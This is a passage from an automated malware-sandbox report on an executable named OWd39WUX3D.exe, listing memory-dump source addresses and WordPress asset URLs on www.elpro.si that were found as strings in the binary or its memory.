00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/wp-smush-pro/app/assets/js/smush-lazy-load.min.js?ver=3.14.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/font-awesome.css?ver=4.7
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.23.0
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.min.js?v
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.min.js?v
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/css/style.css?ver=6.2.2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/favicon.png
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Kosarica.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-Grey.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-White.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header_new.svg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/classic-themes.min.css?ver=6.2.2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, 